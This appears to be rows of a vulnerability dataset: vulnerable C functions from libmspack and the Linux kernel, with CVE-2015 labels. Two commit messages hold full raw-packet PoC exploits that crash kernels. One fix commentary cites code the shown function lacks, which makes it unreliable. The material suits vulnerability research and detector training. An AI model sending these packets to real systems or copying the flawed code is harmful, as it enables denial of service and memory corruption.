match_offset += aligned_bits;
}
else if (extra == 3) {
/* aligned bits only */
READ_HUFFSYM(ALIGNED, aligned_bits);
match_offset += aligned_bits;
}
else if (extra > 0) { /* extra==1, extra==2 */
/* verbatim bits only */
READ_BITS(verbatim_bits, extra);
match_offset += verbatim_bits;
}
else /* extra == 0 */ {
/* ??? not defined in LZX specification! */
match_offset = 1;
}
/* update repeated offset LRU queue */
R2 = R1; R1 = R0; R0 = match_offset;
}
/* LZX DELTA uses max match length to signal even longer match */
if (match_length == LZX_MAX_MATCH && lzx->is_delta) {
int extra_len = 0;
ENSURE_BITS(3); /* 4 entry huffman tree */
if (PEEK_BITS(1) == 0) {
REMOVE_BITS(1); /* '0' -> 8 extra length bits */
READ_BITS(extra_len, 8);
}
else if (PEEK_BITS(2) == 2) {
REMOVE_BITS(2); /* '10' -> 10 extra length bits + 0x100 */
READ_BITS(extra_len, 10);
extra_len += 0x100;
}
else if (PEEK_BITS(3) == 6) {
REMOVE_BITS(3); /* '110' -> 12 extra length bits + 0x500 */
READ_BITS(extra_len, 12);
extra_len += 0x500;
}
else {
REMOVE_BITS(3); /* '111' -> 15 extra length bits */
READ_BITS(extra_len, 15);
}
match_length += extra_len;
}
if ((window_posn + match_length) > lzx->window_size) {
D(("match ran over window wrap"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
/* copy match */
rundest = &window[window_posn];
i = match_length;
/* does match offset wrap the window? */
if (match_offset > window_posn) {
if (match_offset > lzx->offset &&
(match_offset - window_posn) > lzx->ref_data_size)
{
D(("match offset beyond LZX stream"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
/* j = length from match offset to end of window */
j = match_offset - window_posn;
if (j > (int) lzx->window_size) {
D(("match offset beyond window boundaries"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
runsrc = &window[lzx->window_size - j];
if (j < i) {
/* if match goes over the window edge, do two copy runs */
i -= j; while (j-- > 0) *rundest++ = *runsrc++;
runsrc = window;
}
while (i-- > 0) *rundest++ = *runsrc++;
}
else {
runsrc = rundest - match_offset;
while (i-- > 0) *rundest++ = *runsrc++;
}
this_run -= match_length;
window_posn += match_length;
}
} /* while (this_run > 0) */
break;
case LZX_BLOCKTYPE_UNCOMPRESSED:
/* as this_run is limited not to wrap a frame, this also means it
* won't wrap the window (as the window is a multiple of 32k) */
rundest = &window[window_posn];
window_posn += this_run;
while (this_run > 0) {
if ((i = i_end - i_ptr) == 0) {
READ_IF_NEEDED;
}
else {
if (i > this_run) i = this_run;
lzx->sys->copy(i_ptr, rundest, (size_t) i);
rundest += i;
i_ptr += i;
this_run -= i;
}
}
break;
default:
return lzx->error = MSPACK_ERR_DECRUNCH; /* might as well */
}
/* did the final match overrun our desired this_run length? */
if (this_run < 0) {
if ((unsigned int)(-this_run) > lzx->block_remaining) {
D(("overrun went past end of block by %d (%d remaining)",
-this_run, lzx->block_remaining ))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
lzx->block_remaining -= -this_run;
}
} /* while (bytes_todo > 0) */
/* streams don't extend over frame boundaries */
if ((window_posn - lzx->frame_posn) != frame_size) {
D(("decode beyond output frame limits! %d != %d",
window_posn - lzx->frame_posn, frame_size))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
/* re-align input bitstream */
if (bits_left > 0) ENSURE_BITS(16);
if (bits_left & 15) REMOVE_BITS(bits_left & 15);
/* check that we've used all of the previous frame first */
if (lzx->o_ptr != lzx->o_end) {
D(("%ld avail bytes, new %d frame",
(long)(lzx->o_end - lzx->o_ptr), frame_size))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
/* does this intel block _really_ need decoding? */
if (lzx->intel_started && lzx->intel_filesize &&
(lzx->frame <= 32768) && (frame_size > 10))
{
unsigned char *data = &lzx->e8_buf[0];
unsigned char *dataend = &lzx->e8_buf[frame_size - 10];
signed int curpos = lzx->intel_curpos;
signed int filesize = lzx->intel_filesize;
signed int abs_off, rel_off;
/* copy e8 block to the e8 buffer and tweak if needed */
lzx->o_ptr = data;
lzx->sys->copy(&lzx->window[lzx->frame_posn], data, frame_size);
while (data < dataend) {
if (*data++ != 0xE8) { curpos++; continue; }
abs_off = data[0] | (data[1]<<8) | (data[2]<<16) | (data[3]<<24);
if ((abs_off >= -curpos) && (abs_off < filesize)) {
rel_off = (abs_off >= 0) ? abs_off - curpos : abs_off + filesize;
data[0] = (unsigned char) rel_off;
data[1] = (unsigned char) (rel_off >> 8);
data[2] = (unsigned char) (rel_off >> 16);
data[3] = (unsigned char) (rel_off >> 24);
}
data += 4;
curpos += 5;
}
lzx->intel_curpos += frame_size;
}
else {
lzx->o_ptr = &lzx->window[lzx->frame_posn];
if (lzx->intel_filesize) lzx->intel_curpos += frame_size;
}
lzx->o_end = &lzx->o_ptr[frame_size];
/* write a frame */
i = (out_bytes < (off_t)frame_size) ? (unsigned int)out_bytes : frame_size;
if (lzx->sys->write(lzx->output, lzx->o_ptr, i) != i) {
return lzx->error = MSPACK_ERR_WRITE;
}
lzx->o_ptr += i;
lzx->offset += i;
out_bytes -= i;
/* advance frame start position */
lzx->frame_posn += frame_size;
lzx->frame++;
/* wrap window / frame position pointers */
if (window_posn == lzx->window_size) window_posn = 0;
if (lzx->frame_posn == lzx->window_size) lzx->frame_posn = 0;
} /* while (lzx->frame < end_frame) */
if (out_bytes) {
D(("bytes left to output"))
return lzx->error = MSPACK_ERR_DECRUNCH;
}
/* store local state */
STORE_BITS;
lzx->window_posn = window_posn;
lzx->R0 = R0;
lzx->R1 = R1;
lzx->R2 = R2;
return MSPACK_ERR_OK;
}
| 301,703,386,296,293,370,000,000,000,000,000,000,000 | lzxd.c | 337,003,730,914,340,000,000,000,000,000,000,000,000 | [
"CWE-189"
] | CVE-2015-4471 | Off-by-one error in the lzxd_decompress function in lzxd.c in libmspack before 0.5 allows remote attackers to cause a denial of service (buffer under-read and application crash) via a crafted CAB archive. | https://nvd.nist.gov/vuln/detail/CVE-2015-4471 |
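The one-byte underread lives in the byte-realignment step of the LZX_BLOCKTYPE_UNCOMPRESSED case above (ENSURE_BITS(16); if (bits_left > 16) i_ptr -= 2;): after an odd-sized data block, the refill can leave more than 16 buffered bits while i_ptr sits only one byte into the input buffer, so the two-byte rewind steps before its start. A guarded sketch — not the literal libmspack patch, and it assumes the stream's buffer-start field is lzx->inbuf:

/* Realign to a byte boundary, but never rewind i_ptr past the start of
 * the current input buffer. */
ENSURE_BITS(16);
if (bits_left > 16) {
        if (i_ptr - lzx->inbuf < 2)     /* rewinding 2 would underread */
                return lzx->error = MSPACK_ERR_DECRUNCH;
        i_ptr -= 2;
}
bits_left = 0; bit_buffer = 0;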
1,470 | linux | 23b133bdc452aa441fcb9b82cbf6dd05cfd342d0 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/23b133bdc452aa441fcb9b82cbf6dd05cfd342d0 | udf: Check length of extended attributes and allocation descriptors
Check length of extended attributes and allocation descriptors when
loading inodes from disk. Otherwise corrupted filesystems could confuse
the code and make the kernel oops.
Reported-by: Carl Henrik Lunde <chlunde@ping.uio.no>
CC: stable@vger.kernel.org
Signed-off-by: Jan Kara <jack@suse.cz> | 1 | static int udf_read_inode(struct inode *inode, bool hidden_inode)
{
struct buffer_head *bh = NULL;
struct fileEntry *fe;
struct extendedFileEntry *efe;
uint16_t ident;
struct udf_inode_info *iinfo = UDF_I(inode);
struct udf_sb_info *sbi = UDF_SB(inode->i_sb);
struct kernel_lb_addr *iloc = &iinfo->i_location;
unsigned int link_count;
unsigned int indirections = 0;
int bs = inode->i_sb->s_blocksize;
int ret = -EIO;
reread:
if (iloc->logicalBlockNum >=
sbi->s_partmaps[iloc->partitionReferenceNum].s_partition_len) {
udf_debug("block=%d, partition=%d out of range\n",
iloc->logicalBlockNum, iloc->partitionReferenceNum);
return -EIO;
}
/*
* Set defaults, but the inode is still incomplete!
* Note: get_new_inode() sets the following on a new inode:
* i_sb = sb
* i_no = ino
* i_flags = sb->s_flags
* i_state = 0
* clean_inode(): zero fills and sets
* i_count = 1
* i_nlink = 1
* i_op = NULL;
*/
bh = udf_read_ptagged(inode->i_sb, iloc, 0, &ident);
if (!bh) {
udf_err(inode->i_sb, "(ino %ld) failed !bh\n", inode->i_ino);
return -EIO;
}
if (ident != TAG_IDENT_FE && ident != TAG_IDENT_EFE &&
ident != TAG_IDENT_USE) {
udf_err(inode->i_sb, "(ino %ld) failed ident=%d\n",
inode->i_ino, ident);
goto out;
}
fe = (struct fileEntry *)bh->b_data;
efe = (struct extendedFileEntry *)bh->b_data;
if (fe->icbTag.strategyType == cpu_to_le16(4096)) {
struct buffer_head *ibh;
ibh = udf_read_ptagged(inode->i_sb, iloc, 1, &ident);
if (ident == TAG_IDENT_IE && ibh) {
struct kernel_lb_addr loc;
struct indirectEntry *ie;
ie = (struct indirectEntry *)ibh->b_data;
loc = lelb_to_cpu(ie->indirectICB.extLocation);
if (ie->indirectICB.extLength) {
brelse(ibh);
memcpy(&iinfo->i_location, &loc,
sizeof(struct kernel_lb_addr));
if (++indirections > UDF_MAX_ICB_NESTING) {
udf_err(inode->i_sb,
"too many ICBs in ICB hierarchy"
" (max %d supported)\n",
UDF_MAX_ICB_NESTING);
goto out;
}
brelse(bh);
goto reread;
}
}
brelse(ibh);
} else if (fe->icbTag.strategyType != cpu_to_le16(4)) {
udf_err(inode->i_sb, "unsupported strategy type: %d\n",
le16_to_cpu(fe->icbTag.strategyType));
goto out;
}
if (fe->icbTag.strategyType == cpu_to_le16(4))
iinfo->i_strat4096 = 0;
else /* if (fe->icbTag.strategyType == cpu_to_le16(4096)) */
iinfo->i_strat4096 = 1;
iinfo->i_alloc_type = le16_to_cpu(fe->icbTag.flags) &
ICBTAG_FLAG_AD_MASK;
iinfo->i_unique = 0;
iinfo->i_lenEAttr = 0;
iinfo->i_lenExtents = 0;
iinfo->i_lenAlloc = 0;
iinfo->i_next_alloc_block = 0;
iinfo->i_next_alloc_goal = 0;
if (fe->descTag.tagIdent == cpu_to_le16(TAG_IDENT_EFE)) {
iinfo->i_efe = 1;
iinfo->i_use = 0;
ret = udf_alloc_i_data(inode, bs -
sizeof(struct extendedFileEntry));
if (ret)
goto out;
memcpy(iinfo->i_ext.i_data,
bh->b_data + sizeof(struct extendedFileEntry),
bs - sizeof(struct extendedFileEntry));
} else if (fe->descTag.tagIdent == cpu_to_le16(TAG_IDENT_FE)) {
iinfo->i_efe = 0;
iinfo->i_use = 0;
ret = udf_alloc_i_data(inode, bs - sizeof(struct fileEntry));
if (ret)
goto out;
memcpy(iinfo->i_ext.i_data,
bh->b_data + sizeof(struct fileEntry),
bs - sizeof(struct fileEntry));
} else if (fe->descTag.tagIdent == cpu_to_le16(TAG_IDENT_USE)) {
iinfo->i_efe = 0;
iinfo->i_use = 1;
iinfo->i_lenAlloc = le32_to_cpu(
((struct unallocSpaceEntry *)bh->b_data)->
lengthAllocDescs);
ret = udf_alloc_i_data(inode, bs -
sizeof(struct unallocSpaceEntry));
if (ret)
goto out;
memcpy(iinfo->i_ext.i_data,
bh->b_data + sizeof(struct unallocSpaceEntry),
bs - sizeof(struct unallocSpaceEntry));
return 0;
}
ret = -EIO;
read_lock(&sbi->s_cred_lock);
i_uid_write(inode, le32_to_cpu(fe->uid));
if (!uid_valid(inode->i_uid) ||
UDF_QUERY_FLAG(inode->i_sb, UDF_FLAG_UID_IGNORE) ||
UDF_QUERY_FLAG(inode->i_sb, UDF_FLAG_UID_SET))
inode->i_uid = UDF_SB(inode->i_sb)->s_uid;
i_gid_write(inode, le32_to_cpu(fe->gid));
if (!gid_valid(inode->i_gid) ||
UDF_QUERY_FLAG(inode->i_sb, UDF_FLAG_GID_IGNORE) ||
UDF_QUERY_FLAG(inode->i_sb, UDF_FLAG_GID_SET))
inode->i_gid = UDF_SB(inode->i_sb)->s_gid;
if (fe->icbTag.fileType != ICBTAG_FILE_TYPE_DIRECTORY &&
sbi->s_fmode != UDF_INVALID_MODE)
inode->i_mode = sbi->s_fmode;
else if (fe->icbTag.fileType == ICBTAG_FILE_TYPE_DIRECTORY &&
sbi->s_dmode != UDF_INVALID_MODE)
inode->i_mode = sbi->s_dmode;
else
inode->i_mode = udf_convert_permissions(fe);
inode->i_mode &= ~sbi->s_umask;
read_unlock(&sbi->s_cred_lock);
link_count = le16_to_cpu(fe->fileLinkCount);
if (!link_count) {
if (!hidden_inode) {
ret = -ESTALE;
goto out;
}
link_count = 1;
}
set_nlink(inode, link_count);
inode->i_size = le64_to_cpu(fe->informationLength);
iinfo->i_lenExtents = inode->i_size;
if (iinfo->i_efe == 0) {
inode->i_blocks = le64_to_cpu(fe->logicalBlocksRecorded) <<
(inode->i_sb->s_blocksize_bits - 9);
if (!udf_disk_stamp_to_time(&inode->i_atime, fe->accessTime))
inode->i_atime = sbi->s_record_time;
if (!udf_disk_stamp_to_time(&inode->i_mtime,
fe->modificationTime))
inode->i_mtime = sbi->s_record_time;
if (!udf_disk_stamp_to_time(&inode->i_ctime, fe->attrTime))
inode->i_ctime = sbi->s_record_time;
iinfo->i_unique = le64_to_cpu(fe->uniqueID);
iinfo->i_lenEAttr = le32_to_cpu(fe->lengthExtendedAttr);
iinfo->i_lenAlloc = le32_to_cpu(fe->lengthAllocDescs);
iinfo->i_checkpoint = le32_to_cpu(fe->checkpoint);
} else {
inode->i_blocks = le64_to_cpu(efe->logicalBlocksRecorded) <<
(inode->i_sb->s_blocksize_bits - 9);
if (!udf_disk_stamp_to_time(&inode->i_atime, efe->accessTime))
inode->i_atime = sbi->s_record_time;
if (!udf_disk_stamp_to_time(&inode->i_mtime,
efe->modificationTime))
inode->i_mtime = sbi->s_record_time;
if (!udf_disk_stamp_to_time(&iinfo->i_crtime, efe->createTime))
iinfo->i_crtime = sbi->s_record_time;
if (!udf_disk_stamp_to_time(&inode->i_ctime, efe->attrTime))
inode->i_ctime = sbi->s_record_time;
iinfo->i_unique = le64_to_cpu(efe->uniqueID);
iinfo->i_lenEAttr = le32_to_cpu(efe->lengthExtendedAttr);
iinfo->i_lenAlloc = le32_to_cpu(efe->lengthAllocDescs);
iinfo->i_checkpoint = le32_to_cpu(efe->checkpoint);
}
inode->i_generation = iinfo->i_unique;
/* Sanity checks for files in ICB so that we don't get confused later */
if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB) {
/*
* For file in ICB data is stored in allocation descriptor
* so sizes should match
*/
if (iinfo->i_lenAlloc != inode->i_size)
goto out;
/* File in ICB has to fit in there... */
if (inode->i_size > bs - udf_file_entry_alloc_offset(inode))
goto out;
}
switch (fe->icbTag.fileType) {
case ICBTAG_FILE_TYPE_DIRECTORY:
inode->i_op = &udf_dir_inode_operations;
inode->i_fop = &udf_dir_operations;
inode->i_mode |= S_IFDIR;
inc_nlink(inode);
break;
case ICBTAG_FILE_TYPE_REALTIME:
case ICBTAG_FILE_TYPE_REGULAR:
case ICBTAG_FILE_TYPE_UNDEF:
case ICBTAG_FILE_TYPE_VAT20:
if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_IN_ICB)
inode->i_data.a_ops = &udf_adinicb_aops;
else
inode->i_data.a_ops = &udf_aops;
inode->i_op = &udf_file_inode_operations;
inode->i_fop = &udf_file_operations;
inode->i_mode |= S_IFREG;
break;
case ICBTAG_FILE_TYPE_BLOCK:
inode->i_mode |= S_IFBLK;
break;
case ICBTAG_FILE_TYPE_CHAR:
inode->i_mode |= S_IFCHR;
break;
case ICBTAG_FILE_TYPE_FIFO:
init_special_inode(inode, inode->i_mode | S_IFIFO, 0);
break;
case ICBTAG_FILE_TYPE_SOCKET:
init_special_inode(inode, inode->i_mode | S_IFSOCK, 0);
break;
case ICBTAG_FILE_TYPE_SYMLINK:
inode->i_data.a_ops = &udf_symlink_aops;
inode->i_op = &udf_symlink_inode_operations;
inode->i_mode = S_IFLNK | S_IRWXUGO;
break;
case ICBTAG_FILE_TYPE_MAIN:
udf_debug("METADATA FILE-----\n");
break;
case ICBTAG_FILE_TYPE_MIRROR:
udf_debug("METADATA MIRROR FILE-----\n");
break;
case ICBTAG_FILE_TYPE_BITMAP:
udf_debug("METADATA BITMAP FILE-----\n");
break;
default:
udf_err(inode->i_sb, "(ino %ld) failed unknown file type=%d\n",
inode->i_ino, fe->icbTag.fileType);
goto out;
}
if (S_ISCHR(inode->i_mode) || S_ISBLK(inode->i_mode)) {
struct deviceSpec *dsea =
(struct deviceSpec *)udf_get_extendedattr(inode, 12, 1);
if (dsea) {
init_special_inode(inode, inode->i_mode,
MKDEV(le32_to_cpu(dsea->majorDeviceIdent),
le32_to_cpu(dsea->minorDeviceIdent)));
/* Developer ID ??? */
} else
goto out;
}
ret = 0;
out:
brelse(bh);
return ret;
}
| 154,377,499,296,836,300,000,000,000,000,000,000,000 | None | null | [
"CWE-189"
] | CVE-2015-4167 | The udf_read_inode function in fs/udf/inode.c in the Linux kernel before 3.19.1 does not validate certain length values, which allows local users to cause a denial of service (incorrect data representation or integer overflow, and OOPS) via a crafted UDF filesystem. | https://nvd.nist.gov/vuln/detail/CVE-2015-4167 |
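A sketch of the length validation the commit message calls for, slotted next to the in-ICB sanity checks udf_read_inode() above already performs; the exact upstream bounds may differ:

/* Reject on-disk lengths that cannot fit in one inode block before any
 * arithmetic uses them; bs is the blocksize and ret is still -EIO at
 * this point, as in the function above. */
if (iinfo->i_lenEAttr > bs || iinfo->i_lenAlloc > bs)
        goto out;
if (udf_file_entry_alloc_offset(inode) + iinfo->i_lenAlloc > bs)
        goto out;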
1,472 | linux | 04bf464a5dfd9ade0dda918e44366c2c61fce80b | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/04bf464a5dfd9ade0dda918e44366c2c61fce80b | ozwpan: divide-by-zero leading to panic
A network-supplied parameter was not checked before division, leading to
a divide-by-zero. Since this happens in the softirq path, it leads to a
crash. A PoC follows below, which requires the ozprotocol.h file from
this module.
=-=-=-=-=-=
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"
static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
struct oz_elt oz_elt2;
struct oz_multiple_fixed oz_multiple_fixed;
} __packed packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 0,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
},
.oz_elt2 = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_multiple_fixed)
},
.oz_multiple_fixed = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_USB_ENDPOINT_DATA,
.endpoint = 0,
.format = OZ_DATA_F_MULTIPLE_FIXED,
.unit_size = 0,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}
Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
Acked-by: Dan Carpenter <dan.carpenter@oracle.com>
Cc: stable <stable@vger.kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> | 1 | static void oz_usb_handle_ep_data(struct oz_usb_ctx *usb_ctx,
struct oz_usb_hdr *usb_hdr, int len)
{
struct oz_data *data_hdr = (struct oz_data *)usb_hdr;
switch (data_hdr->format) {
case OZ_DATA_F_MULTIPLE_FIXED: {
struct oz_multiple_fixed *body =
(struct oz_multiple_fixed *)data_hdr;
u8 *data = body->data;
int n = (len - sizeof(struct oz_multiple_fixed)+1)
/ body->unit_size;
while (n--) {
oz_hcd_data_ind(usb_ctx->hport, body->endpoint,
data, body->unit_size);
data += body->unit_size;
}
}
break;
case OZ_DATA_F_ISOC_FIXED: {
struct oz_isoc_fixed *body =
(struct oz_isoc_fixed *)data_hdr;
int data_len = len-sizeof(struct oz_isoc_fixed)+1;
int unit_size = body->unit_size;
u8 *data = body->data;
int count;
int i;
if (!unit_size)
break;
count = data_len/unit_size;
for (i = 0; i < count; i++) {
oz_hcd_data_ind(usb_ctx->hport,
body->endpoint, data, unit_size);
data += unit_size;
}
}
break;
}
}
| 108,503,765,742,072,030,000,000,000,000,000,000,000 | ozusbsvc1.c | 4,167,953,671,616,514,400,000,000,000,000,000,000 | [
"CWE-189"
] | CVE-2015-4003 | The oz_usb_handle_ep_data function in drivers/staging/ozwpan/ozusbsvc1.c in the OZWPAN driver in the Linux kernel through 4.0.5 allows remote attackers to cause a denial of service (divide-by-zero error and system crash) via a crafted packet. | https://nvd.nist.gov/vuln/detail/CVE-2015-4003 |
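In oz_usb_handle_ep_data() above, the ISOC branch already guards its division with if (!unit_size) break;, but the OZ_DATA_F_MULTIPLE_FIXED branch divides by body->unit_size unchecked — that is the network-controlled divisor the PoC zeroes. A sketch of the symmetrical guard; the upstream patch may differ in detail:

case OZ_DATA_F_MULTIPLE_FIXED: {
        struct oz_multiple_fixed *body =
                (struct oz_multiple_fixed *)data_hdr;
        u8 *data = body->data;
        int n;

        if (!body->unit_size)           /* network-supplied; reject zero */
                break;
        n = (len - sizeof(struct oz_multiple_fixed) + 1) / body->unit_size;
        while (n--) {
                oz_hcd_data_ind(usb_ctx->hport, body->endpoint,
                                data, body->unit_size);
                data += body->unit_size;
        }
        break;
}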
1,473 | linux | d114b9fe78c8d6fc6e70808c2092aa307c36dc8e | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/d114b9fe78c8d6fc6e70808c2092aa307c36dc8e | ozwpan: Use proper check to prevent heap overflow
Since elt->length is a u8, we can make this variable a u8. Then we can
do proper bounds checking more easily. Without this, a potentially
negative value is passed to the memcpy inside oz_hcd_get_desc_cnf,
resulting in a remotely exploitable heap overflow with network
supplied data.
This could result in remote code execution. A PoC which obtains DoS
follows below. It requires the ozprotocol.h file from this module.
=-=-=-=-=-=
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"
static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
} __packed connect_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 35,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
}
};
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_get_desc_rsp oz_get_desc_rsp;
} __packed pwn_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(1)
},
.oz_elt = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_get_desc_rsp) - 2
},
.oz_get_desc_rsp = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_GET_DESC_RSP,
.req_id = 0,
.offset = htole16(0),
.total_size = htole16(0),
.rcode = 0,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
usleep(300000);
if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}
Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com>
Acked-by: Dan Carpenter <dan.carpenter@oracle.com>
Cc: stable <stable@vger.kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> | 1 | void oz_usb_rx(struct oz_pd *pd, struct oz_elt *elt)
{
struct oz_usb_hdr *usb_hdr = (struct oz_usb_hdr *)(elt + 1);
struct oz_usb_ctx *usb_ctx;
spin_lock_bh(&pd->app_lock[OZ_APPID_USB]);
usb_ctx = (struct oz_usb_ctx *)pd->app_ctx[OZ_APPID_USB];
if (usb_ctx)
oz_usb_get(usb_ctx);
spin_unlock_bh(&pd->app_lock[OZ_APPID_USB]);
if (usb_ctx == NULL)
return; /* Context has gone so nothing to do. */
if (usb_ctx->stopped)
goto done;
/* If sequence number is non-zero then check it is not a duplicate.
* Zero sequence numbers are always accepted.
*/
